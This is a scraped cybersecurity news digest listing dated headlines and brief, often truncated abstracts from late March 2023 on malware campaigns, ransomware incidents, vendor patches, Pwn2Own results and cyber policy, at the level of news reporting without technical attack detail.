Stealthy DBatLoader Malware Loader Spreading Remcos RAT and Formbook in Europe Full Text
Abstract
A new phishing campaign has set its sights on European entities to distribute Remcos RAT and Formbook via a malware loader dubbed DBatLoader . "The malware payload is distributed through WordPress websites that have authorized SSL certificates, which is a common tactic used by threat actors to evade detection engines," Zscaler researchers Meghraj Nandanwar and Satyam Singh said in a report published Monday. The findings build upon a previous report from SentinelOne last month that detailed phishing emails containing malicious attachments that masquerade as financial documents to activate the infection chain. Some of the file formats used to distribute the DBatLoader payload concern the use of a multi-layered obfuscated HTML file and OneNote attachments. The development adds to growing abuse of OneNote files as an initial vector for malware distribution since late last year in response to Microsoft's decision to block macros by default in files downloaded fThe Hacker News
March 28, 2023 – Attack
Telecom giant Lumen suffered a ransomware attack and disclose a second incident Full Text
Abstract
Telecommunications giant Lumen Technologies discovered two cybersecurity incidents, including a ransomware attack. In a filing to the Securities and Exchange Commission, on March 27, 2023, Lumen announced two cybersecurity incidents. One of the incidents...Security Affairs
March 28, 2023 – Breach
Crown Resorts says ransomware group claims accessing some of its files Full Text
Abstract
"We were recently contacted by a ransomware group who claimed they have illegally obtained a limited number of Crown files," a spokesperson of the formerly listed firm said in a statement.Cyware
March 28, 2023 – Government
President Biden Signs Executive Order Restricting Use of Commercial Spyware Full Text
Abstract
U.S. President Joe Biden on Monday signed an executive order that restricts the use of commercial spyware by federal government agencies. The order said the spyware ecosystem "poses significant counterintelligence or security risks to the United States Government or significant risks of improper use by a foreign government or foreign person." It also seeks to ensure that the government's use of such tools is done in a manner that's "consistent with respect for the rule of law, human rights, and democratic norms and values." To that end, the order lays out the various criteria under which commercial spyware could be disqualified for use by U.S. government agencies. They include - The purchase of commercial spyware by a foreign government or person to target the U.S. government, A commercial spyware vendor that uses or discloses sensitive data obtained from the cyber surveillance tool without authorization and operates under the control of a foreign gThe Hacker News
March 28, 2023 – Criminals
Europol details ChatGPT’s potential for criminal abuse Full Text
Abstract
ChatGPT’s ability to draft highly realistic text makes it a useful tool for phishing purposes. In addition to generating human-like language, ChatGPT is capable of producing code in a number of different programming languages.Cyware
March 28, 2023 – Vulnerabilities
Apple Issues Urgent Security Update for Older iOS and iPadOS Models Full Text
Abstract
Apple on Monday backported fixes for an actively exploited security flaw to older iPhone and iPad models. The issue, tracked as CVE-2023-23529 , concerns a type confusion bug in the WebKit browser engine that could lead to arbitrary code execution. It was originally addressed by the tech giant with improved checks as part of updates released on February 13, 2023. An anonymous researcher has been credited with reporting the bug. "Processing maliciously crafted web content may lead to arbitrary code execution," Apple said in a new advisory, adding it's "aware of a report that this issue may have been actively exploited." Details surrounding the exact nature of exploitation are currently not known, but withholding technical specifics is standard procedure as it helps prevent additional in-the-wild abuse targeting susceptible devices. The update is available in versions iOS 15.7.4 and iPadOS 15.7.4 for iPhone 6s (all models), iPhone 7 (all models), iPhoThe Hacker News
March 28, 2023 – Malware
DBatLoader Actively Distributing Malware Targeting European Businesses Full Text
Abstract
The campaign targets manufacturing companies and multiple businesses in European countries through phishing emails. The malicious payload is distributed through WordPress sites with authorized SSL certificates.Cyware
March 28, 2023 – Education
Balancing security risks and innovation potential of shadow IT teams Full Text
Abstract
Shadow IT teams, also known as rogue IT teams, have grown in popularity in recent years due to the rise of cloud-based apps and remote work. However, this has led to operational tension and security risks within many businesses.Cyware
March 27, 2023 – Attack
Operation Tainted Love: New Cyberespionage Campaign by Chinese Full Text
Abstract
A Chinese cyber-espionage campaign, named Operation Tainted Love—associated with Operation Soft Cell—has been found hitting telecommunications providers in the Middle East since Q1 2023. Operation Soft Cell relies heavily on a custom credential theft malware, mim221.Cyware
March 27, 2023 – Policy and Law
20-Year-Old BreachForums Founder Faces Up to 5 Years in Prison Full Text
Abstract
Conor Brian Fitzpatrick, the 20-year-old founder and the administrator of the now-defunct BreachForums has been formally charged in the U.S. with conspiracy to commit access device fraud. If proven guilty, Fitzpatrick, who went by the online moniker "pompompurin," faces a maximum penalty of up to five years in prison. He was arrested on March 15, 2023. "Cybercrime victimizes and steals financial and personal information from millions of innocent people," said U.S. Attorney Jessica D. Aber for the Eastern District of Virginia. "This arrest sends a direct message to cybercriminals: your exploitative and illegal conduct will be discovered, and you will be brought to justice." The development comes days after Baphomet, the individual who had taken over the responsibilities of BreachForums, shut down the website , citing concerns that law enforcement may have obtained access to its backend. The Department of Justice (DoJ) has since confirmed that it coThe Hacker News
March 27, 2023 – Vulnerabilities
Apple fixes recently disclosed CVE-2023-23529 zero-day on older devices Full Text
Abstract
Apple released updates to backport security patches that address actively exploited CVE-2023-23529 WebKit zero-day for older iPhones and iPads. Apple released security updates to backport patches that address an actively exploited zero-day flaw (CVE-2023-23529)...Security Affairs
March 27, 2023 – Hacker
REF2924 Brings a New Weapon NAPLISTENER to the Table Full Text
Abstract
The REF2924 threat cluster was observed dropping a previously-unseen malware, dubbed NAPLISTENER, on entities in Southeast and South Asia. The malware evades network-based forms of detection. Actors target Microsoft Exchange Servers exposed to the internet to deploy several backdoors, includin ... Read MoreCyware
March 27, 2023 – General
Where SSO Falls Short in Protecting SaaS Full Text
Abstract
Single sign-on (SSO) is an authentication method that allows users to authenticate their identity for multiple applications with just one set of credentials. From a security standpoint, SSO is the gold standard. It ensures access without forcing users to remember multiple passwords and can be further secured with MFA. Furthermore, an estimated 61% of attacks stem from stolen credentials. By removing usernames and passwords, the attack surface is reduced as well. SSO helps companies meet strict compliance regulations by not only enabling businesses to secure their accounts, but by helping them demonstrate that they've taken the necessary steps to meet regulatory requirements. While SSO is an important step in securing SaaS apps and their data, having just SSOs in place to secure the SaaS stack in its entirety is not enough. SSO alone won't prevent a threat actor from accessing a SaaS app. It also won't protect SaaS apps that are onboarded without the IT team's knowledgThe Hacker News
March 27, 2023 – Malware
New MacStealer macOS malware appears in the cybercrime underground Full Text
Abstract
A new MacStealer macOS malware allows operators to steal iCloud Keychain data and passwords from infected systems. Uptycs researchers team discovered a new macOS information stealer, called MacStealer, which allows operators to steal iCloud Keychain...Security Affairs
March 27, 2023 – General
Pwn2Own Vancouver 2023 awarded $1,035,000 and a Tesla for 27 0-days Full Text
Abstract
On the third day, contestants were awarded $185,000 after demonstrating 5 zero-day exploits targeting the Ubuntu Desktop, Windows 11, and the VMware Workstation software.Cyware
March 27, 2023 – Malware
New MacStealer macOS Malware Steals iCloud Keychain Data and Passwords Full Text
Abstract
A new information-stealing malware has set its sights on Apple's macOS operating system to siphon sensitive information from compromised devices. Dubbed MacStealer , it's the latest example of a threat that uses Telegram as a command-and-control (C2) platform to exfiltrate data. It primarily affects devices running macOS versions Catalina and later running on M1 and M2 CPUs. "MacStealer has the ability to steal documents, cookies from the victim's browser, and login information," Uptycs researchers Shilpesh Trivedi and Pratik Jeware said in a new report. First advertised on online hacking forums at the start of the month, it is still a work in progress, with the malware authors planning to add features to capture data from Apple's Safari browser and the Notes app. In its current form, MacStealer is designed to extract iCloud Keychain data, passwords and credit card information from browsers like Google Chrome, Mozilla Firefox, and Brave. It also featurThe Hacker News
March 27, 2023 – Malware
Updates from the MaaS: new threats delivered through NullMixer Full Text
Abstract
A technical analysis of NullMixer malware operation revealed Italy and France are the favorite European countries from the attackers’ perspective. Executive Summary Our insights into a recent NullMixer malware operation revealed Italy and France...Security Affairs
March 27, 2023 – Breach
Twitter says source code was leaked on GitHub, now it’s trying to find the culprit Full Text
Abstract
Parts of Twitter’s source code were recently leaked online via GitHub, the New York Times reports, but were taken down after the social media platform filed a DMCA request.Cyware
March 27, 2023 – Vulnerabilities
Microsoft Issues Patch for aCropalypse Privacy Flaw in Windows Screenshot Tools Full Text
Abstract
Microsoft has released an out-of-band update to address a privacy-defeating flaw in its screenshot editing tool for Windows 10 and Windows 11. The issue , dubbed aCropalypse , could enable malicious actors to recover edited portions of screenshots, potentially revealing sensitive information that may have been cropped out. Tracked as CVE-2023-28303 , the vulnerability is rated 3.3 on the CVSS scoring system. It affects both the Snip & Sketch app on Windows 10 and the Snipping Tool on Windows 11. "The severity of this vulnerability is Low because successful exploitation requires uncommon user interaction and several factors outside of an attacker's control," Microsoft said in an advisory released on March 24, 2023. Successful exploitation requires that the following two prerequisites are met - The user must take a screenshot, save it to a file, modify the file (for example, crop it), and then save the modified file to the same location. The user must openThe Hacker News
March 27, 2023 – APT
Technical analysis of China-linked Earth Preta APT’s infection chain Full Text
Abstract
China-linked Earth Preta cyberespionage group has been observed adopting new techniques to bypass security solutions. Trend Micro researchers reported that the China-linked Earth Preta group (aka Mustang Panda) is actively changing its tools, tactics,...Security Affairs
March 27, 2023 – Criminals
The FBI’s BreachForums bust is causing ‘chaos in the cybercrime underground’ Full Text
Abstract
On March 16, 2022, about a month after the FBI took down a popular online forum for buying and selling stolen data known as RaidForums, another criminal marketplace quickly sprung up to take its place.Cyware
March 27, 2023 – Malware
Malicious Python Package uses Unicode support to evade detection Full Text
Abstract
Researchers discovered a malicious package on PyPI that uses Unicode to evade detection while stealing sensitive data. Supply chain security firm Phylum discovered a malicious Python package on the Python Package Index (PyPI) repository that uses...Security Affairs
March 27, 2023 – Government
CISA Ships ‘Untitled Goose Tool’ to Hunt for Microsoft Azure Cloud Infections Full Text
Abstract
Azure network defenders can use the tool to export and review sign-in audit logs and activity alerts from a range of Azure and Microsoft Defender environments to pinpoint signs of suspicious activity.Cyware
March 27, 2023 – Attack
Hackers Attack Wisconsin Court System Computer Network Full Text
Abstract
The attack has not resulted in the breach of any data and court operations are continuing as usual statewide, state Supreme Court Chief Justice Annette Ziegler said in a statement.Cyware
March 26, 2023 – Breach
OpenAI: A Redis bug caused a recent ChatGPT data exposure incident Full Text
Abstract
OpenAI revealed that a Redis bug was the root cause of the recent exposure of users' personal information and chat titles in ChatGPT service. On Friday, OpenAI revealed that the recent exposure of users' personal information and chat titles in its chatbot...Security Affairs
March 26, 2023 – General
Security Affairs newsletter Round 412 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. NCA...Security Affairs
March 26, 2023 – Vulnerabilities
Microsoft shares guidance for investigating attacks exploiting CVE-2023-23397 Full Text
Abstract
Microsoft is warning of cyber attacks exploiting a recently patched Outlook vulnerability tracked as CVE-2023-23397 (CVSS score: 9.8). Microsoft published guidance for investigating attacks exploiting recently patched Outlook vulnerability tracked...Security Affairs
March 26, 2023 – Attack
Vice Society claims attack on Puerto Rico Aqueduct and Sewer Authority Full Text
Abstract
Puerto Rico Aqueduct and Sewer Authority (PRASA) is investigating a cyber attack with the help of the FBI and US CISA. The Puerto Rico Aqueduct and Sewer Authority (PRASA) is investigating a cyberattack that last week hit the agency. The agency quickly...Security Affairs
March 25, 2023 – Vulnerabilities
Critical flaw in AI testing framework MLflow can lead to server and data compromise Full Text
Abstract
The vulnerability found by Dan McInerney is tracked as CVE-2023-1177 and is rated 10 (critical) on the CVSS scale. It is described as a local and remote file inclusion (LFI/RFI) via the API.Cyware
March 25, 2023 – Criminals
U.K. National Crime Agency Sets Up Fake DDoS-For-Hire Sites to Catch Cybercriminals Full Text
Abstract
In what's a case of setting a thief to catch a thief, the U.K. National Crime Agency (NCA) revealed that it has created a network of fake DDoS-for-hire websites to infiltrate the online criminal underground. "All of the NCA-run sites, which have so far been accessed by around several thousand people, have been created to look like they offer the tools and services that enable cyber criminals to execute these attacks," the law enforcement agency said . "However, after users register, rather than being given access to cyber crime tools, their data is collated by investigators." The effort is part of an ongoing international joint effort called Operation PowerOFF in collaboration with authorities from the U.S., the Netherlands, Germany, Poland, and Europol aimed at dismantling criminal DDoS-for-hire infrastructures worldwide. DDoS-for-hire (aka "Booter" or "Stresser") services rent out access to a network of infected devices to other crimThe Hacker News
March 25, 2023 – Business
Cork-based Dope Security lands $16m investment Full Text
Abstract
The Series A funding round was led by Google Ventures (GV), with participation from existing investors Boldstart Ventures and Preface. The company plans to use some of the funding to expand its engineering team in Cork.Cyware
March 25, 2023 – Vulnerabilities
Microsoft Warns of Stealthy Outlook Vulnerability Exploited by Russian Hackers Full Text
Abstract
Microsoft on Friday shared guidance to help customers discover indicators of compromise (IoCs) associated with a recently patched Outlook vulnerability. Tracked as CVE-2023-23397 (CVSS score: 9.8), the critical flaw relates to a case of privilege escalation that could be exploited to steal NT Lan Manager (NTLM) hashes and stage a relay attack without requiring any user interaction. "External attackers could send specially crafted emails that will cause a connection from the victim to an untrusted location of attackers' control," the company noted in an advisory released this month. "This will leak the Net-NTLMv2 hash of the victim to the untrusted network which an attacker can then relay to another service and authenticate as the victim." The vulnerability was resolved by Microsoft as part of its Patch Tuesday updates for March 2023, but not before Russia-based threat actors weaponized the flaw in attacks targeting government, transportation, eneThe Hacker News
March 25, 2023 – Phishing
New Instagram scam uses fake SHEIN gift cards as lure Full Text
Abstract
This social media scam begins with a comment from a random account on a user’s post, which congratulates the victim saying they’re one of the 2023 lucky ones selected to receive a SHEIN gift card.Cyware
March 25, 2023 – Breach
OpenAI Reveals Redis Bug Behind ChatGPT User Data Exposure Incident Full Text
Abstract
OpenAI on Friday disclosed that a bug in the Redis open source library was responsible for the exposure of other users' personal information and chat titles in the upstart's ChatGPT service earlier this week. The glitch , which came to light on March 20, 2023, enabled certain users to view brief descriptions of other users' conversations from the chat history sidebar, prompting the company to temporarily shut down the chatbot. "It's also possible that the first message of a newly-created conversation was visible in someone else's chat history if both users were active around the same time," the company said . The bug, it further added, originated in the redis-py library , leading to a scenario where canceled requests could cause connections to be corrupted and return unexpected data from the database cache, in this case, information belonging to an unrelated user. To make matters worse, the San Francisco-based AI research company said it introduceThe Hacker News
March 25, 2023 – Government
TikTok CEO got grilled by lawmakers from both parties on whether the Chinese-owned app can protect American privacy Full Text
Abstract
TikTok CEO Shou Zi Chew’s testimony did not seem to quell many concerns that lawmakers had about the company’s connections to China or the adequacy of its risk-mitigation plan, Project Texas.Cyware
March 25, 2023 – Breach
Kroger Postal Prescription Services Files Notice of Data Breach Impacting 82,466 Consumers Full Text
Abstract
Upon discovering that sensitive consumer data was made available to an unauthorized party, Kroger Postal Prescription Services began to review the affected files to determine what information was compromised and which consumers were impacted.Cyware
March 25, 2023 – Criminals
NCA infiltrates the cybercriminal underground with fake DDoS-for-hire sites Full Text
Abstract
The U.K. National Crime Agency (NCA) revealed that it has set up a number of fake DDoS-for-hire sites to infiltrate the online criminal underground. The UK National Crime Agency announced it has infiltrated the online criminal marketplace by setting...Security Affairs
March 25, 2023 – Business
Britive, which helps secure public clouds, lands $20.5M investment Full Text
Abstract
Led by Pelion Venture Partners with participation from Liberty Global Ventures, Crosslink Capital and One Way Ventures, the new brings Britive’s total raised to $36 million.Cyware
March 25, 2023 – General
Pwn2Own Vancouver 2023 awarded $1,035,000 and a Tesla for 27 0-days Full Text
Abstract
On the third day of the Pwn2Own Vancouver 2023 hacking contest, the organization awarded $185,000 for 10 zero-day exploits. Pwn2Own Vancouver 2023 is ended, contestants disclosed 27 unique zero-days and the organization awarded a total of $1,035,000...Security Affairs
March 25, 2023 – General
Pwn2Own Vancouver 2023 Day 2: Microsoft Teams, Oracle VirtualBox, and Tesla hacked Full Text
Abstract
On the second day of Pwn2Own Vancouver 2023, the bug hunters demonstrated zero-day attacks against the Oracle VirtualBox virtualization platform, Microsoft Teams, Tesla Model 3, and the Ubuntu Desktop OS.Cyware
March 25, 2023 – General
Pwn2Own Vancouver 2023 Day 1: Windows 11 and Tesla hacked Full Text
Abstract
The Pwn2Own Vancouver 2023 has begun, this hacking competition has 19 entries targeting nine different targets – including two Tesla attempts. On the first day, it awarded $375,000 (and a Tesla Model 3) for 12 zero-day vulnerabilities discovered.Cyware
March 24, 2023 – Breach
Malicious JavaScript Injection Campaign Infects 51,000 Websites Full Text
Abstract
Unit 42 researchers have been tracking a widespread malicious JavaScript (JS) injection campaign that redirects victims to malicious content such as adware and scam pages.Cyware
March 24, 2023 – Malware
Malicious Python Package Uses Unicode Trickery to Evade Detection and Steal Data Full Text
Abstract
A malicious Python package on the Python Package Index (PyPI) repository has been found to use Unicode as a trick to evade detection and deploy an info-stealing malware. The package in question, named onyxproxy , was uploaded to PyPI on March 15, 2023, and comes with capabilities to harvest and exfiltrate credentials and other valuable data. It has since been taken down, but not before attracting a total of 183 downloads . According to software supply chain security firm Phylum, the package incorporates its malicious behavior in a setup script that's packed with thousands of seemingly legitimate code strings. These strings include a mix of bold and italic fonts and are still readable and can be parsed by the Python interpreter, only to activate the execution of the stealer malware upon installation of the package. "An obvious and immediate benefit of this strange scheme is readability," the company noted . "Moreover, these visible differences do not preventThe Hacker News
March 24, 2023 – Policy and Law
Export Control is Not a Magic Bullet for Cyber Mercenaries Full Text
Abstract
The U.S. and the EU need to do more to limit the damage to their intelligence and law enforcement capabilities caused by cyber mercenaries.Lawfare
March 24, 2023 – Government
CISA announced the Pre-Ransomware Notifications initiative Full Text
Abstract
The US Cybersecurity and Infrastructure Security Agency (CISA) announced the Pre-Ransomware Notifications service to help organizations stop ransomware attacks before damage occurs. The US Cybersecurity and Infrastructure Security Agency announced...Security Affairs
March 24, 2023 – Phishing
Fake IRS tax email delivers Emotet malware Full Text
Abstract
In this case, Form W-9 is being used as a lure for people to download something sinister. The attachment, W-9 form.zip, is 709 KB in size. Opening the attachment reveals a Word document called W-9 form.doc that is over 500MB in size.Cyware
March 24, 2023 – Education
THN Webinar: Inside the High Risk of 3rd-Party SaaS Apps Full Text
Abstract
Any app that can improve business operations is quickly added to the SaaS stack. However, employees don't realize that this SaaS-to-SaaS connectivity, which typically takes place outside the view of the security team, significantly increases risk. Whether employees connect through Microsoft 365, Google Workspace, Slack, Salesforce, or any other app, security teams have no way to quantify their exposure. These 'secondary' apps can be requesting an intrusive set of permissions or be malicious. Every click authorizing access may grant the right to edit or delete company files, send emails on behalf of the user, create new files, or otherwise handle data in a way that poses a profound threat to the organization's security. To handle the SaaS Security challenges, security teams need to address the entire SaaS ecosystem. Today's SaaS security evolution has expanded SaaS security beyond simply preventing access. It extends far beyond securing the app. Today's orgaThe Hacker News
March 24, 2023 – Hacker
China-linked hackers target telecommunication providers in the Middle East Full Text
Abstract
Researchers reported that China-linked hackers targeted telecommunication providers in the Middle East in the first quarter of 2023. In the first quarter of 2023, SentinelLabs researchers spotted the initial phases of attacks against telecommunication...Security Affairs
March 24, 2023 – Skimming
A look at a Magecart skimmer using the Hunter obfuscator Full Text
Abstract
When a victim who is shopping at a compromised online store goes to the checkout page, there will be additional fields injected in the contact form that aren't normally there.Cyware
March 24, 2023 – General
GitHub Swiftly Replaces Exposed RSA SSH Key to Protect Git Operations Full Text
Abstract
Cloud-based repository hosting service GitHub said it took the step of replacing its RSA SSH host key used to secure Git operations "out of an abundance of caution" after it was briefly exposed in a public repository. The activity, which was carried out at 05:00 UTC on March 24, 2023, is said to have been undertaken as a measure to prevent any bad actor from impersonating the service or eavesdropping on users' operations over SSH. "This key does not grant access to GitHub's infrastructure or customer data," Mike Hanley, chief security officer and SVP of engineering at GitHub, said in a post. "This change only impacts Git operations over SSH using RSA." The move does not impact Web traffic to GitHub.com and Git operations performed via HTTPS. No change is required for ECDSA or Ed25519 users. The Microsoft-owned company said there is no evidence that the exposed SSH private key was exploited by adversaries. It further emphasized that the &quThe Hacker News
March 24, 2023 – Attack
City of Toronto is one of the victims hacked by Clop gang using GoAnywhere zero-day Full Text
Abstract
Clop ransomware gang added the City of Toronto to the list of its victims, it is another organization compromised by exploiting GoAnywhere zero-day. Clop ransomware gang added the City of Toronto to the list of victims published on its Tor leak...Security Affairs
March 24, 2023 – Hacker
Russian Hackers Deploy New AresLoader Malware via Decoy Installers Full Text
Abstract
The malicious program appears to be developed and used by several members of a pro-Russia hacktivist group and is typically distributed inside decoy installers for legitimate software.Cyware
March 24, 2023 – Hacker
Researchers Uncover Chinese Nation State Hackers’ Deceptive Attack Strategies Full Text
Abstract
A recent campaign undertaken by Earth Preta indicates that nation-state groups aligned with China are getting increasingly proficient at bypassing security solutions. The threat actor , active since at least 2012, is tracked by the broader cybersecurity community under Bronze President, HoneyMyte, Mustang Panda, RedDelta, and Red Lich. Attack chains mounted by the group commence with a spear-phishing email to deploy a wide range of tools for backdoor access, command-and-control (C2), and data exfiltration. These messages come bearing with malicious lure archives distributed via Dropbox or Google Drive links that employ DLL side-loading, LNK shortcut files, and fake file extensions as arrival vectors to obtain a foothold and drop backdoors like TONEINS, TONESHELL, PUBLOAD , and MQsTTang (aka QMAGENT). Similar infection chains utilizing Google Drive links have been observed delivering Cobalt Strike as early as April 2021. "Earth Preta tends to hide malicious payloadsThe Hacker News
March 24, 2023 – Vulnerabilities
Critical flaw in WooCommerce Payments plugin allows site takeover Full Text
Abstract
A patch for a critical vulnerability in the WooCommerce Payments plugin for WordPress has been released for over 500,000 websites. On March 23, 2023, researchers from Wordfence observed that the “WooCommerce Payments – Fully Integrated Solution...Security Affairs
March 24, 2023 – Attack
City of Toronto and Financing Firm Investissement Québec Confirm Being Hit by Ransomware Attack Full Text
Abstract
“Today, the City of Toronto has confirmed that unauthorized access to City data did occur through a third party vendor. The access is limited to files that were unable to be processed through the third-party secure file transfer system,” it said.Cyware
March 24, 2023 – Vulnerabilities
Critical WooCommerce Payments Plugin Flaw Patched for 500,000+ WordPress Sites Full Text
Abstract
Patches have been released for a critical security flaw impacting the WooCommerce Payments plugin for WordPress, which is installed on over 500,000 websites. The flaw, if left unresolved, could enable a bad actor to gain unauthorized admin access to impacted stores, the company said in an advisory on March 23, 2023. It impacts versions 4.8.0 through 5.6.1. Put differently, the issue could permit an "unauthenticated attacker to impersonate an administrator and completely take over a website without any user interaction or social engineering required," WordPress security company Wordfence said . The vulnerability appears to reside in a PHP file called "class-platform-checkout-session.php," Sucuri researcher Ben Martin noted . Credited with discovering and reporting the vulnerability is Michael Mazzolini of Swiss penetration testing company GoldNetwork. WooCommerce also said it worked with WordPress to auto-update sites using affected versions of the softwarThe Hacker News
March 24, 2023 – General
Pwn2Own Vancouver 2023 Day 2: Microsoft Teams, Oracle VirtualBox, and Tesla hacked Full Text
Abstract
On the second day of Pwn2Own Vancouver 2023, the organization awarded $475,000 for 10 unique zero-day vulnerabilities. On the second day of Pwn2Own Vancouver 2023, the organization awarded $475,000 for 10 unique zero-day vulnerabilities, bringing...Security Affairs
March 24, 2023 – Vulnerabilities
High-Severity Vulnerabilities Found in WellinTech Industrial Data Historian Full Text
Abstract
Cisco’s Talos threat intelligence and research unit this week disclosed the details of two high-severity vulnerabilities discovered last year in WellinTech’s KingHistorian industrial data historian software.Cyware
March 24, 2023 – APT
SideCopy APT Targets India’s Premier Defense Research Agency Full Text
Abstract
SideCopy APT traditionally uses spear phishing as its method to gain initial entry. Emails in the latest campaign purportedly contain research material about military technologies sent as attachments.Cyware
March 24, 2023 – Breach
User Data Leak at Korean Beauty Platform PowderRoom Impacts One Million People Full Text
Abstract
The Cybernews research team discovered that the South Korean social platform, powderroom.co.kr – which markets itself as the nation’s biggest beauty community – was leaking the private data of a million users.Cyware
March 23, 2023 – APT
Kimsuky Updates its Tactics to Target South Korean Experts Full Text
Abstract
German and South Korean government agencies warned about a new spear-phishing campaign by the North Korean APT, Kimsuky. The campaign targets experts on issues related to the Korean peninsula. Attackers send a spear-phishing email to the targeted victims, asking them to install a malicious Chrome e ... Read MoreCyware
March 23, 2023 – Malware
Fake ChatGPT Chrome Browser Extension Caught Hijacking Facebook Accounts Full Text
Abstract
Google has stepped in to remove a bogus Chrome browser extension from the official Web Store that masqueraded as OpenAI's ChatGPT service to harvest Facebook session cookies and hijack the accounts. The "ChatGPT For Google" extension, a trojanized version of a legitimate open source browser add-on , attracted over 9,000 installations since March 14, 2023, prior to its removal. It was originally uploaded to the Chrome Web Store on February 14, 2023. According to Guardio Labs researcher Nati Tal, the extension is propagated through malicious sponsored Google search results that are designed to redirect unsuspecting users searching for "Chat GPT-4" to fraudulent landing pages that point to the fake add-on. Installing the extension adds the promised functionality – i.e., enhancing search engines with ChatGPT – but it also stealthily activates the ability to capture Facebook-related cookies and exfiltrate it to a remote server in an encrypted manner. OncThe Hacker News
March 23, 2023 – Breach
A million at risk from user data leak at Korean beauty platform PowderRoom Full Text
Abstract
South Korean beauty content platform, PowderRoom, has leaked the personal information of nearly one million people. Established in 2003, PowderRoom is a South Korean beauty content platform connecting 3.5 million members and thousands of beauty brands It...Security Affairs
March 23, 2023 – APT
Black Magic APT Targets Ukraine with CommonMagic and PowerMagic Full Text
Abstract
Kaspersky researchers have identified cyberattacks targeting government, agriculture, and transportation organizations in Donetsk, Lugansk, and Crimea, conducted by the new Bad Magic APT. The campaign leverages old artifacts created as early as September 2021, along with a previously unseen malicio ... Read MoreCyware
March 23, 2023 – Malware
Nexus: A New Rising Android Banking Trojan Targeting 450 Financial Apps Full Text
Abstract
An emerging Android banking trojan dubbed Nexus has already been adopted by several threat actors to target 450 financial applications and conduct fraud. "Nexus appears to be in its early stages of development," Italian cybersecurity firm Cleafy said in a report published this week. "Nexus provides all the main features to perform ATO attacks (Account Takeover) against banking portals and cryptocurrency services, such as credentials stealing and SMS interception." The trojan, which appeared in various hacking forums at the start of the year, is advertised as a subscription service to its clientele for a monthly fee of $3,000. Details of the malware were first documented by Cyble earlier this month. However, there are indications that the malware may have been used in real-world attacks as early as June 2022, at least six months before its official announcement on darknet portals. According to security researcher Rohit Bansal ( @0xrb ) and confirmed by tThe Hacker News
March 23, 2023 – Malware
Experts published PoC exploit code for Veeam Backup & Replication bug Full Text
Abstract
Researchers released a PoC exploit code for a high-severity vulnerability in Veeam Backup & Replication (VBR) software. Veeam recently addressed a high-severity flaw, tracked as CVE-2023-27532, in Veeam Backup and Replication (VBR) software....Security Affairs
March 23, 2023 – Attack
Skylink hit by hacker attack Full Text
Abstract
M7 Group’s Czech and Slovak operator Skylink has reportedly fallen victim to a hacker attack. Skylink offers DTH and internet TV services in the Czech Republic and Slovakia.Cyware
March 23, 2023 – General
2023 Cybersecurity Maturity Report Reveals Organizational Unpreparedness for Cyberattacks Full Text
Abstract
In 2022 alone, global cyberattacks increased by 38%, resulting in substantial business loss, including financial and reputational damage. Meanwhile, corporate security budgets have risen significantly because of the growing sophistication of attacks and the number of cybersecurity solutions introduced into the market. With this rise in threats, budgets, and solutions, how prepared are industries and countries to effectively address today's cyber risk? CYE's new Cybersecurity Maturity Report 2023 tackles this question by shedding light on the strength of cybersecurity in different sectors, company sizes, and countries. It highlights which industries and countries have the most robust cyber postures and which are lagging, as well as the most prevalent vulnerabilities in today's cyber threat landscape. The analysis is based on two years' worth of data, collected from over 500 organizations in 15 countries, and spanning 11 industries and a range of company sizes. It measures cybersecThe Hacker News
March 23, 2023 – Vulnerabilities
Cisco fixed multiple severe vulnerabilities in its IOS and IOS XE software Full Text
Abstract
Cisco addressed tens of vulnerabilities in its IOS and IOS XE software, six of these issues have been rated ‘high severity’. Cisco published the March 2023 Semiannual IOS and IOS XE Software Security Advisory that addresses several vulnerabilities...Security Affairs
March 23, 2023 – General
Hacktivists Increasingly Claim Targeting of OT Systems Full Text
Abstract
The number of false claims is at times challenging to debunk. However, despite the inaccuracy of most claims, when hacktivist activity targeting OT becomes commonplace, the likelihood of actual and even substantial OT incidents increases.Cyware
March 23, 2023 – Breach
Operation Soft Cell: Chinese Hackers Breach Middle East Telecom Providers Full Text
Abstract
Telecommunication providers in the Middle East are the subject of new cyber attacks that commenced in the first quarter of 2023. The intrusion set has been attributed to a Chinese cyber espionage actor associated with a long-running campaign dubbed Operation Soft Cell based on tooling overlaps. "The initial attack phase involves infiltrating Internet-facing Microsoft Exchange servers to deploy web shells used for command execution," researchers from SentinelOne and QGroup said in a new technical report shared with The Hacker News. "Once a foothold is established, the attackers conduct a variety of reconnaissance, credential theft, lateral movement, and data exfiltration activities." Operation Soft Cell, according to Cybereason , refers to malicious activities undertaken by China-affiliated actors targeting telecommunications providers since at least 2012. The Soft Cell threat actor, also tracked by Microsoft as Gallium , is known to target unpatched intThe Hacker News
March 23, 2023 – Malware
Nexus, an emerging Android banking Trojan targets 450 financial apps Full Text
Abstract
Experts warn of an emerging Android banking trojan dubbed Nexus that was employed in attacks against 450 financial applications. Cybersecurity firm experts from Cleafy warn of an emerging Android banking trojan, named Nexus, that was employed...Security Affairs
March 23, 2023 – Vulnerabilities
Cisco Patches High-Severity Vulnerabilities in IOS Software Full Text
Abstract
Cisco published its semiannual IOS and IOS XE software security advisory bundle, which addresses ten vulnerabilities, including six 'high-severity’ ones. The most important three security bugs can be exploited remotely to cause a DoS condition.Cyware
March 23, 2023 – Hacker
German and South Korean Agencies Warn of Kimsuky’s Expanding Cyber Attack Tactics Full Text
Abstract
German and South Korean government agencies have warned about cyber attacks mounted by a threat actor tracked as Kimsuky using rogue browser extensions to steal users' Gmail inboxes. The joint advisory comes from Germany's domestic intelligence apparatus, the Federal Office for the Protection of the Constitution (BfV), and South Korea's National Intelligence Service of the Republic of Korea (NIS). The intrusions are designed to strike "experts on the Korean Peninsula and North Korea issues" through spear-phishing campaigns, the agencies noted. Kimsuky , also known Black Banshee, Thallium, and Velvet Chollima, refers to a subordinate element within North Korea's Reconnaissance General Bureau and is known to "collect strategic intelligence on geopolitical events and negotiations affecting the DPRK's interests." Primary targets of interest include entities in the U.S. and South Korea, particularly singling out individuals working withinThe Hacker News
March 23, 2023 – Breach
Dole discloses data breach after February ransomware attack Full Text
Abstract
Dole Food Company confirmed that threat actors behind the recent ransomware attack had access to employees' data. Dole Food Company is an Irish agricultural multinational corporation, it is one of the world’s largest producers of...Security Affairs
March 23, 2023 – Business
Splashtop Buys Foxpass to Bring Enterprise IAM to the Masses Full Text
Abstract
Remote access provider Splashtop has acquired the server and network access management vendor Foxpass to get better visibility across co-managed and multi-tenant environments.Cyware
March 23, 2023 – General
